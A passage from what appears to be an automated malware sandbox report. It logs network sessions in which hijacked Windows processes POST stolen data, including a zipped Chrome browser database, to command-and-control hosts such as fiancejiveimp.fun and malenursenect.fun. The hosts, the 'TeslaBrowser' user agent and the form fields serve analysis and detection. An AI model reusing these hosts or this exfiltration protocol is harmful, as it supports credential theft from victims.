                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:25.312083006 CEST6396INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=n19vkg0lo803llm0aldc49kuge; expires=Sat, 27 Jan 2024 01:42:04 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:25 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OdfJb0QlxIeo%2F%2BwlHz4BQ1fKUFw4QR6AlnCi8Sqkyh4GEoHNjKHc6V%2FhKs3BsS%2BiHz%2FBcBqiFD%2Fs068ZiaUSCbVpSHRxOUPhmmjWOlIAqvi6Fej%2FDz%2FSgHITmlbKuA83xHvzMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f696f230818-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:25.312144995 CEST6396INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    44192.168.2.349879172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:25.319715023 CEST6397OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:25.320292950 CEST6398OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:25.659931898 CEST6399INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=jr7bmfcjgvbcoptbvsn0luh1re; expires=Sat, 27 Jan 2024 01:42:04 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:25 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TlqsdU%2FvCX%2B5lRH%2BqvW7VetR8BWoDYnyDNPdL7CdUaHaFKqErxXFkYz91IJCxZ%2BYck3u7AO78n4rMweBvkY7Qt6YPirkzrFPQivuxbQEd%2F04YuBI1zi5vusQt9WGfj%2Bmk37YKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f6b7c307f86-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:25.660011053 CEST6399INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    45192.168.2.349880104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:25.793631077 CEST6400OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 86379
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:25.794399023 CEST6411OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:25.888246059 CEST6413OUTData Raw: dd 6f 6f db 44 1c 07 70 3b 49 e3 b5 5b c7 ba ad 33 55 f7 c0 d5 84 5a 6b 19 a3 aa fa 60 54 88 65 ad 29 d1 b2 74 cb 52 44 85 e0 e4 c6 97 cc aa 1d a7 b6 53 28 3c 4a 07 3c e2 65 4c 13 42 bc 05 9e ec d9 c4 03 de 02 0f 40 02 1e 20 f1 0c c1 13 ee ec 34
                                                                    Data Ascii: ooDp;I[3UZk`Te)tRDS(<J<eLB@ 4gm4H}>S+K)A"Bfs[k6xq&'{Zz"HKOx)\W,Ion[Q391}e&|oy'~*HO?x
                                                                    Oct 3, 2023 09:55:25.889076948 CEST6431OUTData Raw: 2c 62 69 9b 9e a7 5b a4 ea b4 58 08 b6 1b 4f 6c 35 8d 67 4c 78 84 d1 ae e8 5e 07 77 a2 aa ea b9 ac fc 96 3c aa 1d c3 46 58 0c 3e 2e f8 67 25 79 45 15 db 53 c1 3a 16 4e a4 2c 98 c7 23 f9 24 cc cc 26 4d a8 d7 0d f9 05 4b 53 91 26 1d 51 84 b7 6e b4
                                                                    Data Ascii: ,bi[XOl5gLx^w<FX>.g%yES:N,#$&MKS&QnXzp$Kg#>nLk`pWIgu('U]m2]~?-Gv3UT'W,n6-.CW'/.s(|xze9z
                                                                    Oct 3, 2023 09:55:25.889102936 CEST6433OUTData Raw: b4 cd f1 44 52 ac df 91 29 a3 0c 4b 0b bc 19 da c8 66 06 af a5 20 79 10 f2 96 97 35 b5 12 ed ce b0 72 c0 5b f1 78 a7 18 92 ba fd f8 68 9b 20 ad 10 e3 cf 5b 0e 8d c3 d3 04 de 6a 65 28 23 80 81 ff b7 be 81 bf ee 6f 8d e7 21 8f 12 c5 78 c6 31 63 fc
                                                                    Data Ascii: DR)Kf y5r[xh [je(#o!x1cPK2WBpPKNCW#Chrome/Default/BrowserDB/000005.ldbXS&X`%!A!&B@D]@`25@d\R\-K-l
                                                                    Oct 3, 2023 09:55:25.889102936 CEST6436OUTData Raw: fd 87 cb 17 fd bf a0 18 49 21 92 f1 c0 48 5a 80 b6 30 9a d6 4d bb 9f 50 f4 f3 d3 3a 85 7d f9 1f 2e ca 0c 0e 31 48 8a 2c 7e 97 16 aa d1 da f8 35 25 54 63 ca 54 d8 ff 1b 84 69 de fb ff 0d 61 14 eb d6 8d 33 93 d2 00 d6 4d 30 89 ae 5b 27 65 a9 72 35
                                                                    Data Ascii: I!HZ0MP:}.1H,~5%TcTia3M0['er5(e:UD<S-i<CYRJ$]@^&^m[ss3e1_'0\3>lPXs]Uu}#}UnG=g]_htSiN{p/kmnr-i
                                                                    Oct 3, 2023 09:55:25.984075069 CEST6440OUTData Raw: ee 9a d1 96 d1 2a 57 65 dd c4 44 65 45 6b af 2f ab bd af b5 bc b9 c5 6a 6d ec 19 98 a8 9b 6c cf 6d 9c b4 7b bd 6d 29 35 63 63 1e 32 0e 9e 11 5f f5 fa fe 35 6b bb eb 8a eb 33 a7 87 fb bd 3d 35 be 29 eb 86 89 b5 de 96 5a 7f 65 91 ad ac b2 64 ba ad
                                                                    Data Ascii: *WeDeEk/jmlm{m)5cc2_5k3=5)Zed|\67\R]-himf67z'{:{yCQ[Qs Y_^[}*@{uTND>{dY]m^;qhgn]8P=PRR
                                                                    Oct 3, 2023 09:55:25.984236956 CEST6467OUTData Raw: e7 d2 2a e5 6c b7 32 2c 97 f3 ae 29 fc d7 c6 3f f5 bc f7 28 af d3 c4 af d3 b4 fb 3a be cb ce f6 4d b1 0d 39 c1 67 ac 0d 7c 6d 88 bf f7 b2 fd 3d db 95 e4 d8 bb a4 b5 b2 a4 d2 d6 f0 36 63 be ef 4e 2f 2f d1 c8 5b 57 f1 a3 4e 8e c7 19 67 31 87 75 3d
                                                                    Data Ascii: *l2,)?(:M9g|m=6cN//[WNg1u=~#o3$eN6,N`HXjJM9,J|W{h6^#lr}gf4!~T{Wovw,Z85Fi*_BSTcRX/f-gSM28n(|S;cn|I;
                                                                    Oct 3, 2023 09:55:25.984307051 CEST6473OUTData Raw: 1c 07 8a d1 b4 4e d1 3f 6b 14 bb 49 0d 31 18 4b a5 d7 7c 01 1c 45 62 07 49 61 28 4a 94 78 f9 5b 3c 2d 31 17 d0 bc 5e 70 44 96 b3 74 3a 13 6b fe a8 ef 57 89 85 9a c9 7d b3 d7 68 84 52 9d b1 3e 4c 0a bc 7a 8d 2f 19 8c cf 84 7b a4 5e ee 46 e1 e3 6f
                                                                    Data Ascii: N?kI1K|EbIa(Jx[<-1^pDt:kW}hR>Lz/{^Foi-WsH3~ 'iU{bWNg9$[TA%%`QKD11kqX(9RV:R&qPq'/GTY4s(gIyI"iZ&O
                                                                    Oct 3, 2023 09:55:25.984391928 CEST6478OUTData Raw: 45 98 1f a3 a9 45 a8 b3 d7 c5 c3 8d e3 57 63 d3 08 fa 93 95 1e 4e cc cb 0a 6c 09 65 94 17 81 b5 e5 05 3e 99 05 ba 1e 63 8d 30 26 4e ef 22 9b b4 ef 4f a1 2c 27 b3 8f cd 0f 70 20 03 81 55 78 36 80 ca 18 7c fb 23 9c fc 67 f8 ba 0a 9b 48 8a 39 71 cf
                                                                    Data Ascii: EEWcNle>c0&N"O,'p Ux6|#gH9qMvkG_+xdMVcn,;G[XgbX[J<\f\Ig-exxo~)vg#ExsbF8&j3!>\d10V
                                                                    Oct 3, 2023 09:55:25.984575987 CEST6483OUTData Raw: bb 53 84 46 76 47 e0 ba a9 c0 89 b6 f6 51 a9 1f 0a b5 ca c9 80 eb bd 70 d0 bb 7d 20 31 aa 2a ad c4 4a 0e 89 5b b5 76 90 a3 68 47 49 9d d8 1a 3f 51 a5 8b 1f 6e 57 58 16 a9 09 d7 d6 e9 9a e4 2d 5b 5d 63 14 e1 23 71 5f 61 67 72 ab 74 ec 6a 8f 6e 2f
                                                                    Data Ascii: SFvGQp} 1*J[vhGI?QnWX-[]c#q_agrtjn/Jb>8wk/WH[Up'MT#T^bI2SZMABS<qwNmIa:=vh;N&Xjag7##a)B/{_BbXN>=_1[+m")
                                                                    Oct 3, 2023 09:55:26.602135897 CEST6492INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=b1gat6aingjvfpnbade6jvjqsa; expires=Sat, 27 Jan 2024 01:42:05 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:26 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eeCfHsyoRcZa56o0ij9QW2ChhyN6IF7RWt4F%2FYzMG5oxY%2FMXax612pGBqVXjZ6WfZmPdJUMSaHXPrXW1BXdyhqyoYsZvO5AFMQWixHoAOD8lMbsyDZmCeV7KHiYIlKA97fw2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f6e684a200f-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:26.602168083 CEST6492INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    46192.168.2.349881104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:25.909909964 CEST6436OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:25.910021067 CEST6437OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:26.271060944 CEST6489INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ldv4a7emc8mhomsnmq83ng794l; expires=Sat, 27 Jan 2024 01:42:05 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:26 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2iXSMwTIEtlIhePxxnJn1FZewJ70jERzvd77%2FNbDpMr7f0yFEsa1d7QRpVf0Hls2SGXm7t9pzkJVlxgS19NL7HNhTkn61nCuBqNV2lMNPtkf52l7%2F1a%2BHd%2BlRWUzj8sltYzYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f6f28222427-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:26.271121025 CEST6490INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    47192.168.2.349882172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:26.519020081 CEST6490OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:26.519619942 CEST6491OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:26.931001902 CEST6495INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=up0d3llhsvhu28kbnl1lp2kg33; expires=Sat, 27 Jan 2024 01:42:05 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:26 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UOZ63d6o5GeGh%2Fbxix7V0IlxFdkoCusGihTWUftCB9spKFRMoFE6ajOv0DVHDXdSiPgDmIrzpLJaBRwfxHnu%2Blh6cLJy0fnKsyUh7iUXSNz7N%2FCjelzTJle09ZEzHmECvQQGkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f72ff0f2072-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:26.931061983 CEST6495INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    48192.168.2.349883172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:26.814066887 CEST6493OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:26.814516068 CEST6493OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:27.135700941 CEST6496INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=n1rb9tudd8gts1r40tjquvek98; expires=Sat, 27 Jan 2024 01:42:06 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:27 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0%2B4z%2F%2F4m1m5owKCwSIKtg2VQrsE9NKiP4ftxTceewYlw7YQxjSe8g8AhaMkBislXREUYpGCbhqpuuNzV6%2BWQyoBMXMBeDIMpmAYb%2B9hcYaxeUzVcBZjISsGtrJIaqOfFdjEsow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f74ca2c077c-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:27.135730982 CEST6496INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    49192.168.2.349884104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:27.160444975 CEST6497OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:27.161024094 CEST6497OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:27.448828936 CEST6500INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ledi7f73il8fkol5gkm709autf; expires=Sat, 27 Jan 2024 01:42:06 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:27 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kezx6LA4RfTKP1zxy8m8f8phjM8m2HKiq1xox8Ls1YvZvkSEIXAs8ZDmIQTzw3iOEqRCMpDVKyWSLxL%2Fv9BpiEddkaNObXVZrhxt23jPa20Nfw4CBZuTt15yxHh8iUvpJbHnsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f76f81d3894-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:27.448863029 CEST6500INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.349808211.181.24.13380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:27.051235914 CEST1543OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://xgeyakiifw.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 180
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:27.051235914 CEST1543OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3f 24 cf ad
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu?$M[a0ag 4hDivp,T&&PEI/^.7NXc y)%
                                                                    Oct 3, 2023 09:54:27.719454050 CEST1544OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://xgeyakiifw.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 180
                                                                    Host: gudintas.at
                                                                    Data Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3f 24 cf ad 7f 11 dc b7 f0 4d 5b e4 b4 f9 8e ee 61 06 a3 e1 f8 92 93 30 cd f1 bb 61 d4 67 02 20 1b 34 68 8d 0a e8 44 69 81 db fe dc f5 93 7f 76 c5 b4 a7 70 ca 1f 8c 04 a7 2c de 54 26 26 8d 50 45 ed 0e 49 2f 5e 8a 2e d1 f8 8a ef 95 c1 90 f5 d3 37 81 83 e2 0b 4e 84 58 63 a6 83 20 ba 79 29 25 80 e9 ca 80 88
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu?$M[a0ag 4hDivp,T&&PEI/^.7NXc y)%
                                                                    Oct 3, 2023 09:54:28.566061020 CEST1545INHTTP/1.0 404 Not Found
